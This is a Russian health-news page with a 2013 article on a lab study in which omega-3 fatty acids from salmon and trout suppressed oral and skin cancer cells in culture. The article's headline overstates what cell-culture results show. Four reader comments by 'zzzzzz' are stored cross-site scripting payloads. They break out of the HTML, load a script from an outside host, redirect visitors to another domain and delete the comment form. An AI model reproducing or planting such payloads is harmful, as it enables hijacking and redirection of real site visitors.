Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какая рыба спасет от рака...  >>  Какая рыба спасет от рака? Ученые узнали – узнайте и вы!
 
Обратная связь
 

Какая рыба спасет от рака? Ученые узнали – узнайте и вы!

Размер шрифта
10 сентября 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Британские ученые установили, что омега-3 жирные кислоты, которыми содержаться в  лососе и форели в огромных количеств, подавляют рост и вызывают гибель атипичных клеток на ранних и поздних стадиях рака ротовой полости и кожи.

Какая рыба спасет от рака? Ученые узнали – узнайте и вы!

Согласно данным исследований, омега-3 жирные кислоты вызывают гибель злокачественных и предзлокачественных клеток в дозах, которые не влияют на здоровые нормальных клеток, что свидетельствует о возможности их использования для лечения и профилактики определенных видов рака кожи и ротовой полости.

В процессе эксперимента ученые изучали плоскоклеточный рак – одну из основных форм рака кожи. По частоте встречаемости плоскоклеточный рак ротовой полости занимает шестое место в мире среди всех видов рака, а его лечение сложное и дорогостоящее.

В экспериментах ученые выращивали клеточные культуры из разных клеточных линий (злокачественные и предзлокачественные клетки (плоскоклеточный рак ротовой полости и кожи), а также здоровые клетки ротовой полости и кожи) и добавляли к ним жирные кислоты. «Мы обнаружили, что омега-3 жирные кислоты избирательно подавляют рост злокачественных и предзлокачественных клеток в дозах, которые не влияют на здоровые клетки», – рассказывает профессор Кеннет Паркинсон из Института стоматологии королевы Марии. «Оказывается, это свойство частично обусловлено избыточной стимуляцией основного фактора роста, вызывающего гибель клеток».

Поскольку дозы, в которых применялись омега-3 жирные кислоты, не влияют на здоровые клетки, в частности это касается эйкозапентаеновой кислоты, то их можно использовать для профилактики и лечения рака кожи и ротовой полости. Возможно, омега-3 жирные кислоты помогут пациентам, имеющим повышенный риск развития данных видов рака или их рецидива. Кроме того, необходимое количество жирных кислот в виде аэрозоля или геля можно легко нанести на пораженную поверхность. Однако, несмотря на обнадеживающие результаты, полученные в данном исследовании, необходимы дополнительные данные.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

11 сентября 2013 в 11:16

Цитировать   |   Пожаловаться

Омега-3 так же содержится в алюторской сельди.Она так же не уступает по содержанию Омега-3 лососю и форели

2 - zzzzzz

30 июня 2015 в 19:05

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 19:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 23:04

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   На что слетаются мухи? Оказывается, на рак!   Стоит ли есть мясо? Хотите ли вы получить рак или нет?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Еда против рака. Часть 1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.